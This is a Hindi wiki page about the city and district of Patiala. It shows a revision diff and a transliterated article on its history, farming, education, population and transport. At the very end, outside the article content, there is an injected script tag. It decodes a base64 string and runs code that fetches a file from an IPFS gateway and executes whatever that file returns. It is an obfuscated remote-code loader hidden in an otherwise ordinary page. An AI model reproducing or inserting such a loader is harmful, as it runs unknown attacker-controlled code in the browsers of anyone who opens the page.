Difference between revisions of "पटियाला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
[[चित्र:Patiala-Museum.jpg|thumb|250px|पटियाला का संग्रहालय ]]
+
[[चित्र:Patiala-Museum.jpg|thumb|250px|पटियाला का संग्रहालय ]]  
{{tocright}}
+
'''पटियाला''' शहर और ज़िला, पश्चिमोत्तर [[भारत]] के दक्षिण-पूर्व [[पंजाब]] राज्य में है। 1763 में इसकी स्थापना पटियाला रियासत की राजधानी के रूप में हुई थी। 1948 में इस रियासत का भारतीय संघ में विलय हो जाने के बाद यह पटियाला तथा पूर्वी पंजाब के राज्यों के संघ (पेप्सू) की राजधानी बना और 1966 में पंजाब राज्य में पेप्सू के विलय तक इसकी यही स्थिति बनी रही। आज़ादी के पहले और बाद में पटियाला राजनीतिक, प्रशासनिक और सांस्कृतिक दृष्टि से काफ़ी महत्त्वपूर्ण रहा है। पंजाब की सभी रियासतों में पटियाला सबसे महत्त्वपूर्ण था, वर्तमान ज़िला उसी क्षेत्र का एक हिस्सा है।
पटियाला शहर और ज़िला, पश्चिमोत्तर [[भारत]] के दक्षिण-पूर्व [[पंजाब]] राज्य में है। 1763 में इसकी स्थापना पटियाला रियासत की राजधानी के रूप में हुई थी। 1948 में इस रियासत का भारतीय संघ में विलय हो जाने के बाद यह पटियाला तथा पूर्वी पंजाब के राज्यों के संघ (पेप्सू) की राजधानी बना और 1966 में पंजाब राज्य में पेप्सू के विलय तक इसकी यही स्थिति बनी रही। आज़ादी के पहले और बाद में पटियाला राजनीतिक, प्रशासनिक और सांस्कृतिक दृष्टि से काफ़ी महत्त्वपूर्ण रहा है। पंजाब की सभी रियासतों में पटियाला सबसे महत्त्वपूर्ण था, वर्तमान ज़िला उसी क्षेत्र का एक हिस्सा है।
 
 
==कृषि==
 
==कृषि==
 
पटियाला ज़िला, दक्षिण-पूर्वी मालवा के मैदान का हिस्सा है। इसके क्षेत्रफल के लगभग 82 प्रतिशत हिस्से पर खेती होती है, अधिकांश हिस्सों में दो फ़सलें उगाई जाती है। और व्यावहारिक रूप से समूचा क्षेत्र नलकूपों द्वारा सिंचित है। कृषि परिदृश्य में [[गेहूँ]] और चावल की प्रधानता है। मक्का, गन्ना और तिलहन अन्य फ़सलें हैं।
 
पटियाला ज़िला, दक्षिण-पूर्वी मालवा के मैदान का हिस्सा है। इसके क्षेत्रफल के लगभग 82 प्रतिशत हिस्से पर खेती होती है, अधिकांश हिस्सों में दो फ़सलें उगाई जाती है। और व्यावहारिक रूप से समूचा क्षेत्र नलकूपों द्वारा सिंचित है। कृषि परिदृश्य में [[गेहूँ]] और चावल की प्रधानता है। मक्का, गन्ना और तिलहन अन्य फ़सलें हैं।
Line 7: Line 6:
 
राजपुरा इस ज़िले का महत्त्वपुर्ण औद्योगिक शहर है।
 
राजपुरा इस ज़िले का महत्त्वपुर्ण औद्योगिक शहर है।
 
==सिंचाई और ऊर्जा==
 
==सिंचाई और ऊर्जा==
 +
[[चित्र:Kali-Devi-Temple-Patiala.jpg|thumb|काली देवी मंदिर, पटियाला]]
 
*पटियाला के पास से सरहिंद नहर की एक शाखा गुज़रती है।  
 
*पटियाला के पास से सरहिंद नहर की एक शाखा गुज़रती है।  
 
*88 प्रतिशत घरों में बिजली का उपयोग होता है।
 
*88 प्रतिशत घरों में बिजली का उपयोग होता है।
Line 15: Line 15:
 
==परिवहन==
 
==परिवहन==
 
यह शहर प्रमुख रेलमार्ग पर स्थित है और सड़क द्वारा महत्त्वपूर्ण नगरों से संबध्द है। 98 प्रतिशत से अधिक गांव सड़क मार्ग से जुड़े हुये हैं।
 
यह शहर प्रमुख रेलमार्ग पर स्थित है और सड़क द्वारा महत्त्वपूर्ण नगरों से संबध्द है। 98 प्रतिशत से अधिक गांव सड़क मार्ग से जुड़े हुये हैं।
 
+
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 25: Line 24:
 
}}
 
}}
 
==संबंधित लेख==
 
==संबंधित लेख==
{{पंजाब के पर्यटन स्थल}}
+
{{पंजाब के नगर}}{{पंजाब के पर्यटन स्थल}}
{{पंजाब के नगर}}
 
 
[[Category:पंजाब]] 
 
[[Category:पंजाब]] 
 
[[Category:पंजाब के नगर]][[Category:भारत के नगर]]
 
[[Category:पंजाब के नगर]][[Category:भारत के नगर]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Latest revision as of 09:00, 17 July 2012

thumb|250px|patiyala ka sangrahalay patiyala shahar aur zila, pashchimottar bharat ke dakshin-poorv panjab rajy mean hai. 1763 mean isaki sthapana patiyala riyasat ki rajadhani ke roop mean huee thi. 1948 mean is riyasat ka bharatiy sangh mean vilay ho jane ke bad yah patiyala tatha poorvi panjab ke rajyoan ke sangh (pepsoo) ki rajadhani bana aur 1966 mean panjab rajy mean pepsoo ke vilay tak isaki yahi sthiti bani rahi. azadi ke pahale aur bad mean patiyala rajanitik, prashasanik aur saanskritik drishti se kafi mahattvapoorn raha hai. panjab ki sabhi riyasatoan mean patiyala sabase mahattvapoorn tha, vartaman zila usi kshetr ka ek hissa hai.

krishi

patiyala zila, dakshin-poorvi malava ke maidan ka hissa hai. isake kshetraphal ke lagabhag 82 pratishat hisse par kheti hoti hai, adhikaansh hissoan mean do fasalean ugaee jati hai. aur vyavaharik roop se samoocha kshetr nalakoopoan dvara sianchit hai. krishi paridrishy mean gehooan aur chaval ki pradhanata hai. makka, ganna aur tilahan any fasalean haian.

udyog

rajapura is zile ka mahattvapurn audyogik shahar hai.

sianchaee aur oorja

thumb|kali devi mandir, patiyala

  • patiyala ke pas se sarahiand nahar ki ek shakha guzarati hai.
  • 88 pratishat gharoan mean bijali ka upayog hota hai.

shiksha

patiyala shahar mean panjab vishvavidyalay (1962 mean sthapit) aur isase sanbaddh kee mahavidyalay, neshanal ianstityoot aauf sports gavarnameant medikal k aaulej ,gavarnameant deantal k aaulej, guru amaradas bizanes skool aur thapar ianstityoot aauf ianjiniyariang aiand teknol aauji (vishvavidyalay) hai, jo patiyala ko samany aur vyavasayik shiksha ka mahattvapoorn keandr banate haian.

janasankhya

2001 ki janaganana ke anusar 82,551 ki janasankhya vala rajapura is zile ka mahattvapurn audyogik shahar hai. 2001 ki janaganana ke anusar nagar ki kul janasankhya 3,02,870 aur zile ki kul janasankhya 18,39,056 hai.

parivahan

yah shahar pramukh relamarg par sthit hai aur s dak dvara mahattvapoorn nagaroan se sanbadhd hai. 98 pratishat se adhik gaanv s dak marg se ju de huye haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>